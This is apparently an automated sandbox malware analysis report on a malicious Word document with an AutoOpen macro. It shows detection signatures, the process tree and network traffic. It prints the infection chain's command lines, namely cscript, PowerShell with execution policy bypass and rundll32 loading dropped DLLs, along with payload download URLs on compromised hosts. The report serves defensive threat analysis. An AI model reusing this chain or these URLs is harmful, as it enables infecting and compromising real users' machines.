Loading ...

Play interactive tourEdit tour

Windows Analysis Report sample.doc.vir

Overview

General Information

Sample Name:sample.doc.vir (renamed file extension from vir to doc)
Analysis ID:528758
MD5:6be56f977b6692fb6ce5f94e110664e3
SHA1:f4d5ce35c656e0f156a2ced453a964faabef09fb
SHA256:ae94cd20505f914bba5e612acb80c429c5606a739c0838e3a5f87bfcc7cc8519
Tags:docxvir
Infos:

Most interesting Screenshot:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected MalDoc
Multi AV Scanner detection for submitted file
Sigma detected: Office product drops script at suspicious location
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for domain / URL
Yara detected Powershell download and execute
Document contains an embedded VBA with many string operations indicating source code obfuscation
Document contains an embedded VBA macro which may execute processes
Document contains OLE streams with names of living off the land binaries
Sigma detected: Change PowerShell Policies to a Unsecure Level
Document contains an embedded VBA with base64 encoded strings
Sigma detected: Microsoft Office Product Spawning Windows Shell
Document contains an embedded VBA macro with suspicious strings
Document contains an embedded macro with GUI obfuscation
Document exploit detected (process start blacklist hit)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Document has an unknown application name
May sleep (evasive loops) to hinder dynamic analysis
Internet Provider seen in connection with other malware
Stores large binary data to the registry
Document contains an embedded VBA macro which executes code when the document is opened / closed
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Uses insecure TLS / SSL version for HTTPS connection
Document misses a certain OLE stream usually present in this Microsoft Office document type
Contains long sleeps (>= 3 min)
Enables debug privileges
Document contains no OLE stream with summary information
Potential document exploit detected (unknown TCP traffic)
Contains functionality to detect virtual machines (SLDT)
Document contains embedded VBA macros
Potential document exploit detected (performs HTTP gets)
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w7x64
  • WINWORD.EXE (PID: 684 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
    • cscript.exe (PID: 344 cmdline: "C:\Windows\System32\cscript.exe" C:\Users\user\AppData\Roaming\www.txt //E:VBScript //NoLogo %~f0 %* MD5: ECB021CA3370582F0C7244B0CF06732C)
      • powershell.exe (PID: 2676 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass & C:\Users\user\AppData\Roaming\www.ps1 MD5: 852D67A27E454BD389FA7F02A8CBE23F)
      • cmd.exe (PID: 2204 cmdline: "C:\Windows\System32\cmd.exe" /c rundll32.exe C:\ProgramData\www1.dll,ldr MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
        • rundll32.exe (PID: 2236 cmdline: rundll32.exe C:\ProgramData\www1.dll,ldr MD5: DD81D91FF3B0763C392422865C9AC12E)
      • cmd.exe (PID: 2560 cmdline: "C:\Windows\System32\cmd.exe" /c rundll32.exe C:\ProgramData\www2.dll,ldr MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
        • rundll32.exe (PID: 2076 cmdline: rundll32.exe C:\ProgramData\www2.dll,ldr MD5: DD81D91FF3B0763C392422865C9AC12E)
      • cmd.exe (PID: 2640 cmdline: "C:\Windows\System32\cmd.exe" /c rundll32.exe C:\ProgramData\www3.dll,ldr MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
        • rundll32.exe (PID: 1612 cmdline: rundll32.exe C:\ProgramData\www3.dll,ldr MD5: DD81D91FF3B0763C392422865C9AC12E)
      • cmd.exe (PID: 2012 cmdline: "C:\Windows\System32\cmd.exe" /c rundll32.exe C:\ProgramData\www4.dll,ldr MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
        • rundll32.exe (PID: 2988 cmdline: rundll32.exe C:\ProgramData\www4.dll,ldr MD5: DD81D91FF3B0763C392422865C9AC12E)
      • cmd.exe (PID: 940 cmdline: "C:\Windows\System32\cmd.exe" /c rundll32.exe C:\ProgramData\www5.dll,ldr MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
        • rundll32.exe (PID: 2648 cmdline: rundll32.exe C:\ProgramData\www5.dll,ldr MD5: DD81D91FF3B0763C392422865C9AC12E)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
sample.doc.docOffice_AutoOpen_MacroDetects an Microsoft Office file that contains the AutoOpen Macro functionFlorian Roth
  • 0x1dece:$s1: AutoOpen
  • 0x1f200:$s1: AutoOpen
  • 0x16100:$s2: Macros
sample.doc.docJoeSecurity_MalDocYara detected MalDocJoe Security
    sample.doc.docJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

      Dropped Files

      SourceRuleDescriptionAuthorStrings
      C:\Users\user\AppData\Roaming\www.ps1JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
        C:\Users\user\AppData\Local\Temp\~DF26415DDA42946BBE.TMPJoeSecurity_MalDocYara detected MalDocJoe Security
          C:\Users\user\AppData\Local\Temp\~DF26415DDA42946BBE.TMPJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{C9C61CB4-AA54-4D1D-A472-514E047583D2}.tmpJoeSecurity_MalDocYara detected MalDocJoe Security
              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{C9C61CB4-AA54-4D1D-A472-514E047583D2}.tmpJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
                Click to see the 2 entries

                Sigma Overview

                System Summary:

                barindex
                Sigma detected: Change PowerShell Policies to a Unsecure LevelShow sources
                Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass & C:\Users\user\AppData\Roaming\www.ps1, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass & C:\Users\user\AppData\Roaming\www.ps1, CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cscript.exe" C:\Users\user\AppData\Roaming\www.txt //E:VBScript //NoLogo %~f0 %*, ParentImage: C:\Windows\System32\cscript.exe, ParentProcessId: 344, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass & C:\Users\user\AppData\Roaming\www.ps1, ProcessId: 2676
                Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
                Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: "C:\Windows\System32\cscript.exe" C:\Users\user\AppData\Roaming\www.txt //E:VBScript //NoLogo %~f0 %*, CommandLine: "C:\Windows\System32\cscript.exe" C:\Users\user\AppData\Roaming\www.txt //E:VBScript //NoLogo %~f0 %*, CommandLine|base64offset|contains: h.(, Image: C:\Windows\System32\cscript.exe, NewProcessName: C:\Windows\System32\cscript.exe, OriginalFileName: C:\Windows\System32\cscript.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 684, ProcessCommandLine: "C:\Windows\System32\cscript.exe" C:\Users\user\AppData\Roaming\www.txt //E:VBScript //NoLogo %~f0 %*, ProcessId: 344
                Sigma detected: Non Interactive PowerShellShow sources
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass & C:\Users\user\AppData\Roaming\www.ps1, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass & C:\Users\user\AppData\Roaming\www.ps1, CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cscript.exe" C:\Users\user\AppData\Roaming\www.txt //E:VBScript //NoLogo %~f0 %*, ParentImage: C:\Windows\System32\cscript.exe, ParentProcessId: 344, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass & C:\Users\user\AppData\Roaming\www.ps1, ProcessId: 2676

                Data Obfuscation:

                barindex
                Sigma detected: Office product drops script at suspicious locationShow sources
                Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 684, TargetFilename: C:\Users\user\AppData\Roaming\www.ps1

                Jbx Signature Overview

                Click to jump to signature section

                Show All Signature Results

                AV Detection:

                barindex
                Multi AV Scanner detection for submitted fileShow sources
                Source: sample.doc.docVirustotal: Detection: 50%Perma Link
                Source: sample.doc.docReversingLabs: Detection: 60%
                Antivirus / Scanner detection for submitted sampleShow sources
                Source: sample.doc.docAvira: detected
                Multi AV Scanner detection for domain / URLShow sources
                Source: ghapan.comVirustotal: Detection: 8%Perma Link
                Source: yoowi.netVirustotal: Detection: 8%Perma Link
                Source: chaturanga.groopy.comVirustotal: Detection: 8%Perma Link
                Source: gruasingenieria.peVirustotal: Detection: 7%Perma Link
                Source: unknownHTTPS traffic detected: 136.243.74.161:443 -> 192.168.2.22:49167 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 192.185.17.114:443 -> 192.168.2.22:49169 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 210.211.111.87:443 -> 192.168.2.22:49170 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 143.95.80.83:443 -> 192.168.2.22:49171 version: TLS 1.0
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                Source: Binary string: :ystem.pdb& source: powershell.exe, 00000003.00000002.480423902.00000000022F7000.00000004.00000040.sdmp
                Source: Binary string: System.pdbgement.Automation.pdbBBw source: powershell.exe, 00000003.00000002.480423902.00000000022F7000.00000004.00000040.sdmp
                Source: Binary string: C:\Windows\System.pdby source: powershell.exe, 00000003.00000002.480423902.00000000022F7000.00000004.00000040.sdmp
                Source: Binary string: m.Management.Automation.pdbpdbion.pdbAlbu source: powershell.exe, 00000003.00000002.480423902.00000000022F7000.00000004.00000040.sdmp
                Source: Binary string: ws\System.pdbpdbtem.pdbIL source: powershell.exe, 00000003.00000002.480423902.00000000022F7000.00000004.00000040.sdmp
                Source: Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdbion source: powershell.exe, 00000003.00000002.480423902.00000000022F7000.00000004.00000040.sdmp
                Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbmmon source: powershell.exe, 00000003.00000002.480423902.00000000022F7000.00000004.00000040.sdmp
                Source: Binary string: C:\Windows\symbols\dll\System.pdb_3 source: powershell.exe, 00000003.00000002.480423902.00000000022F7000.00000004.00000040.sdmp
                Source: Binary string: System.pdb source: powershell.exe, 00000003.00000002.480423902.00000000022F7000.00000004.00000040.sdmp
                Source: Binary string: System.pdb8 source: powershell.exe, 00000003.00000002.480423902.00000000022F7000.00000004.00000040.sdmp
                Source: Binary string: C:\Windows\dll\System.pdben source: powershell.exe, 00000003.00000002.480423902.00000000022F7000.00000004.00000040.sdmp
                Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdb Fil source: powershell.exe, 00000003.00000002.480423902.00000000022F7000.00000004.00000040.sdmp
                Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.480423902.00000000022F7000.00000004.00000040.sdmp
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior

                Software Vulnerabilities:

                barindex
                Document exploit detected (process start blacklist hit)Show sources
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\cscript.exe
                Source: global trafficDNS query: name: ghapan.com
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 136.243.74.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 136.243.74.161:443

                Networking:

                barindex
                Yara detected MalDocShow sources
                Source: Yara matchFile source: sample.doc.doc, type: SAMPLE
                Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\~DF26415DDA42946BBE.TMP, type: DROPPED
                Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{C9C61CB4-AA54-4D1D-A472-514E047583D2}.tmp, type: DROPPED
                Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\~DF77272A7F6F18B150.TMP, type: DROPPED
                Source: Joe Sandbox ViewASN Name: HETZNER-ASDE HETZNER-ASDE
                Source: Joe Sandbox ViewASN Name: ASMALLORANGE1US ASMALLORANGE1US
                Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
                Source: global trafficHTTP traffic detected: GET /Kdg73onC3oQ/090921.html HTTP/1.1Host: ghapan.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Host: ghapan.com
                Source: global trafficHTTP traffic detected: GET /LUS1NTVui6/090921.html HTTP/1.1Host: gruasingenieria.peConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /tDzEJ8uVGwdj/130921.html HTTP/1.1Host: yoowi.netConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /7SEZBnhMLW/130921.html HTTP/1.1Host: chaturanga.groopy.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Host: chaturanga.groopy.com
                Source: Joe Sandbox ViewIP Address: 136.243.74.161 136.243.74.161
                Source: Joe Sandbox ViewIP Address: 143.95.80.83 143.95.80.83
                Source: Joe Sandbox ViewIP Address: 192.185.17.114 192.185.17.114
                Source: Joe Sandbox ViewIP Address: 210.211.111.87 210.211.111.87
                Source: unknownHTTPS traffic detected: 136.243.74.161:443 -> 192.168.2.22:49167 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 192.185.17.114:443 -> 192.168.2.22:49169 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 210.211.111.87:443 -> 192.168.2.22:49170 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 143.95.80.83:443 -> 192.168.2.22:49171 version: TLS 1.0
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49169
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49168
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49167
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49172
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49171
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49170
                Source: unknownNetwork traffic detected: HTTP traffic on port 49172 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49168 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49169 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49170 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49167 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49171 -> 443
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 25 Nov 2021 17:39:46 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Tue, 23 Apr 2019 06:20:01 GMTAccept-Ranges: bytesContent-Length: 746Vary: Accept-EncodingContent-Type: text/html
                Source: powershell.exe, 00000003.00000002.490992699.000000001CD90000.00000002.00020000.sdmp, rundll32.exe, 00000008.00000002.508165947.0000000001C00000.00000002.00020000.sdmp, rundll32.exe, 0000000B.00000002.494551301.0000000001BF0000.00000002.00020000.sdmp, rundll32.exe, 0000000E.00000002.487440567.0000000001BF0000.00000002.00020000.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
                Source: powershell.exe, 00000003.00000002.480120330.00000000003AE000.00000004.00000020.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
                Source: powershell.exe, 00000003.00000002.490797633.000000001B7EB000.00000004.00000001.sdmp, powershell.exe, 00000003.00000002.490825378.000000001B80E000.00000004.00000001.sdmp, powershell.exe, 00000003.00000002.490816444.000000001B802000.00000004.00000001.sdmp, powershell.exe, 00000003.00000002.480120330.00000000003AE000.00000004.00000020.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
                Source: powershell.exe, 00000003.00000002.490825378.000000001B80E000.00000004.00000001.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
                Source: powershell.exe, 00000003.00000002.490797633.000000001B7EB000.00000004.00000001.sdmp, powershell.exe, 00000003.00000002.490825378.000000001B80E000.00000004.00000001.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
                Source: powershell.exe, 00000003.00000002.490825378.000000001B80E000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                Source: powershell.exe, 00000003.00000002.490797633.000000001B7EB000.00000004.00000001.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
                Source: powershell.exe, 00000003.00000002.490816444.000000001B802000.00000004.00000001.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
                Source: powershell.exe, 00000003.00000002.490992699.000000001CD90000.00000002.00020000.sdmp, rundll32.exe, 00000008.00000002.508165947.0000000001C00000.00000002.00020000.sdmp, rundll32.exe, 0000000B.00000002.494551301.0000000001BF0000.00000002.00020000.sdmp, rundll32.exe, 0000000E.00000002.487440567.0000000001BF0000.00000002.00020000.sdmpString found in binary or memory: http://investor.msn.com
                Source: powershell.exe, 00000003.00000002.490992699.000000001CD90000.00000002.00020000.sdmp, rundll32.exe, 00000008.00000002.508165947.0000000001C00000.00000002.00020000.sdmp, rundll32.exe, 0000000B.00000002.494551301.0000000001BF0000.00000002.00020000.sdmp, rundll32.exe, 0000000E.00000002.487440567.0000000001BF0000.00000002.00020000.sdmpString found in binary or memory: http://investor.msn.com/
                Source: powershell.exe, 00000003.00000002.491254959.000000001CF77000.00000002.00020000.sdmp, rundll32.exe, 00000008.00000002.508325975.0000000001DE7000.00000002.00020000.sdmp, rundll32.exe, 0000000B.00000002.494743650.0000000001DD7000.00000002.00020000.sdmp, rundll32.exe, 0000000E.00000002.487769249.0000000001DD7000.00000002.00020000.sdmp, rundll32.exe, 00000011.00000002.490806349.0000000001D07000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XML.asp
                Source: powershell.exe, 00000003.00000002.491254959.000000001CF77000.00000002.00020000.sdmp, rundll32.exe, 00000008.00000002.508325975.0000000001DE7000.00000002.00020000.sdmp, rundll32.exe, 0000000B.00000002.494743650.0000000001DD7000.00000002.00020000.sdmp, rundll32.exe, 0000000E.00000002.487769249.0000000001DD7000.00000002.00020000.sdmp, rundll32.exe, 00000011.00000002.490806349.0000000001D07000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
                Source: powershell.exe, 00000003.00000002.490825378.000000001B80E000.00000004.00000001.sdmp, powershell.exe, 00000003.00000002.490816444.000000001B802000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                Source: powershell.exe, 00000003.00000002.490797633.000000001B7EB000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
                Source: powershell.exe, 00000003.00000002.490816444.000000001B802000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
                Source: powershell.exe, 00000003.00000002.490816444.000000001B802000.00000004.00000001.sdmp, powershell.exe, 00000003.00000002.480120330.00000000003AE000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
                Source: powershell.exe, 00000003.00000002.490797633.000000001B7EB000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com05
                Source: powershell.exe, 00000003.00000002.490797633.000000001B7EB000.00000004.00000001.sdmp, powershell.exe, 00000003.00000002.490825378.000000001B80E000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.entrust.net03
                Source: powershell.exe, 00000003.00000002.490825378.000000001B80E000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.entrust.net0D
                Source: cscript.exe, 00000001.00000002.474455251.0000000003CB0000.00000002.00020000.sdmp, powershell.exe, 00000003.00000002.480445007.0000000002450000.00000002.00020000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
                Source: cscript.exe, 00000001.00000002.474013786.0000000001D00000.00000002.00020000.sdmpString found in binary or memory: http://servername/isapibackend.dll
                Source: powershell.exe, 00000003.00000002.491254959.000000001CF77000.00000002.00020000.sdmp, rundll32.exe, 00000008.00000002.508325975.0000000001DE7000.00000002.00020000.sdmp, rundll32.exe, 0000000B.00000002.494743650.0000000001DD7000.00000002.00020000.sdmp, rundll32.exe, 0000000E.00000002.487769249.0000000001DD7000.00000002.00020000.sdmp, rundll32.exe, 00000011.00000002.490806349.0000000001D07000.00000002.00020000.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
                Source: powershell.exe, 00000003.00000002.491254959.000000001CF77000.00000002.00020000.sdmp, rundll32.exe, 00000008.00000002.508325975.0000000001DE7000.00000002.00020000.sdmp, rundll32.exe, 0000000B.00000002.494743650.0000000001DD7000.00000002.00020000.sdmp, rundll32.exe, 0000000E.00000002.487769249.0000000001DD7000.00000002.00020000.sdmp, rundll32.exe, 00000011.00000002.490806349.0000000001D07000.00000002.00020000.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
                Source: cscript.exe, 00000001.00000002.474455251.0000000003CB0000.00000002.00020000.sdmp, powershell.exe, 00000003.00000002.480445007.0000000002450000.00000002.00020000.sdmpString found in binary or memory: http://www.%s.comPA
                Source: powershell.exe, 00000003.00000002.490825378.000000001B80E000.00000004.00000001.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
                Source: powershell.exe, 00000003.00000002.490797633.000000001B7EB000.00000004.00000001.sdmp, powershell.exe, 00000003.00000002.490816444.000000001B802000.00000004.00000001.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
                Source: powershell.exe, 00000003.00000002.490992699.000000001CD90000.00000002.00020000.sdmp, rundll32.exe, 00000008.00000002.508165947.0000000001C00000.00000002.00020000.sdmp, rundll32.exe, 0000000B.00000002.494551301.0000000001BF0000.00000002.00020000.sdmp, rundll32.exe, 0000000E.00000002.487440567.0000000001BF0000.00000002.00020000.sdmpString found in binary or memory: http://www.hotmail.com/oe
                Source: powershell.exe, 00000003.00000002.491254959.000000001CF77000.00000002.00020000.sdmp, rundll32.exe, 00000008.00000002.508325975.0000000001DE7000.00000002.00020000.sdmp, rundll32.exe, 0000000B.00000002.494743650.0000000001DD7000.00000002.00020000.sdmp, rundll32.exe, 0000000E.00000002.487769249.0000000001DD7000.00000002.00020000.sdmp, rundll32.exe, 00000011.00000002.490806349.0000000001D07000.00000002.00020000.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
                Source: powershell.exe, 00000003.00000002.490992699.000000001CD90000.00000002.00020000.sdmp, rundll32.exe, 00000008.00000002.508165947.0000000001C00000.00000002.00020000.sdmp, rundll32.exe, 0000000B.00000002.494551301.0000000001BF0000.00000002.00020000.sdmp, rundll32.exe, 0000000E.00000002.487440567.0000000001BF0000.00000002.00020000.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
                Source: rundll32.exe, 00000011.00000002.490483837.0000000001B20000.00000002.00020000.sdmpString found in binary or memory: http://www.windows.com/pctv.
                Source: powershell.exe, 00000003.00000002.489165427.0000000003891000.00000004.00000001.sdmp, powershell.exe, 00000003.00000002.488776483.0000000003692000.00000004.00000001.sdmpString found in binary or memory: https://chaturanga.groopy.com
                Source: powershell.exe, 00000003.00000002.488776483.0000000003692000.00000004.00000001.sdmpString found in binary or memory: https://chaturanga.groopy.com/
                Source: powershell.exe, 00000003.00000002.489165427.0000000003891000.00000004.00000001.sdmpString found in binary or memory: https://chaturanga.groopy.com/7S
                Source: powershell.exe, 00000003.00000002.488776483.0000000003692000.00000004.00000001.sdmpString found in binary or memory: https://chaturanga.groopy.com/7SEZBnhMLW/130921.html
                Source: powershell.exe, 00000003.00000002.489165427.0000000003891000.00000004.00000001.sdmpString found in binary or memory: https://chaturanga.groopy.com/7SEZBnhMLW/130921.htmlPE
                Source: powershell.exe, 00000003.00000002.489165427.0000000003891000.00000004.00000001.sdmpString found in binary or memory: https://chaturanga.groopy.com/cgi-sys/suspendedpage.cgi
                Source: powershell.exe, 00000003.00000002.489165427.0000000003891000.00000004.00000001.sdmpString found in binary or memory: https://chaturanga.groopy.comp
                Source: powershell.exe, 00000003.00000002.488776483.0000000003692000.00000004.00000001.sdmpString found in binary or memory: https://ghapan.c
                Source: powershell.exe, 00000003.00000002.489114799.0000000003865000.00000004.00000001.sdmp, powershell.exe, 00000003.00000002.488776483.0000000003692000.00000004.00000001.sdmpString found in binary or memory: https://ghapan.com
                Source: powershell.exe, 00000003.00000002.488776483.0000000003692000.00000004.00000001.sdmpString found in binary or memory: https://ghapan.com/Kdg73onC3o
                Source: powershell.exe, 00000003.00000002.488776483.0000000003692000.00000004.00000001.sdmpString found in binary or memory: https://ghapan.com/Kdg73onC3oQ
                Source: powershell.exe, 00000003.00000002.488776483.0000000003692000.00000004.00000001.sdmpString found in binary or memory: https://ghapan.com/Kdg73onC3oQ/0
                Source: powershell.exe, 00000003.00000002.488776483.0000000003692000.00000004.00000001.sdmpString found in binary or memory: https://ghapan.com/Kdg73onC3oQ/090921.html
                Source: powershell.exe, 00000003.00000002.488776483.0000000003692000.00000004.00000001.sdmpString found in binary or memory: https://ghapan.com/Kdg73onC3oQ/090921.htmlPE
                Source: powershell.exe, 00000003.00000002.489124422.000000000386C000.00000004.00000001.sdmp, powershell.exe, 00000003.00000002.489114799.0000000003865000.00000004.00000001.sdmpString found in binary or memory: https://ghapan.com/cgi-sys/suspendedpage.cgi
                Source: powershell.exe, 00000003.00000002.489124422.000000000386C000.00000004.00000001.sdmpString found in binary or memory: https://ghapan.comp
                Source: powershell.exe, 00000003.00000002.489165427.0000000003891000.00000004.00000001.sdmpString found in binary or memory: https://gruasingenieria.pe
                Source: powershell.exe, 00000003.00000002.488776483.0000000003692000.00000004.00000001.sdmpString found in binary or memory: https://gruasingenieria.pe/LU
                Source: powershell.exe, 00000003.00000002.489165427.0000000003891000.00000004.00000001.sdmp, powershell.exe, 00000003.00000002.488776483.0000000003692000.00000004.00000001.sdmpString found in binary or memory: https://gruasingenieria.pe/LUS
                Source: powershell.exe, 00000003.00000002.489165427.0000000003891000.00000004.00000001.sdmpString found in binary or memory: https://gruasingenieria.pe/LUS1N
                Source: powershell.exe, 00000003.00000002.488776483.0000000003692000.00000004.00000001.sdmpString found in binary or memory: https://gruasingenieria.pe/LUS1NTVui6/090921.html
                Source: powershell.exe, 00000003.00000002.489165427.0000000003891000.00000004.00000001.sdmpString found in binary or memory: https://gruasingenieria.pe/LUS1NTVui6/090921.htmlPE
                Source: powershell.exe, 00000003.00000002.489679052.0000000003AE8000.00000004.00000001.sdmpString found in binary or memory: https://lotolands.com
                Source: powershell.exe, 00000003.00000002.488776483.0000000003692000.00000004.00000001.sdmpString found in binary or memory: https://lotolands.com/JtaTAt4
                Source: powershell.exe, 00000003.00000002.489679052.0000000003AE8000.00000004.00000001.sdmp, powershell.exe, 00000003.00000002.488776483.0000000003692000.00000004.00000001.sdmpString found in binary or memory: https://lotolands.com/JtaTAt4E
                Source: powershell.exe, 00000003.00000002.489679052.0000000003AE8000.00000004.00000001.sdmpString found in binary or memory: https://lotolands.com/JtaTAt4Ej/
                Source: powershell.exe, 00000003.00000002.488776483.0000000003692000.00000004.00000001.sdmpString found in binary or memory: https://lotolands.com/JtaTAt4Ej/130921.html
                Source: powershell.exe, 00000003.00000002.489679052.0000000003AE8000.00000004.00000001.sdmpString found in binary or memory: https://lotolands.com/JtaTAt4Ej/130921.htmlPE
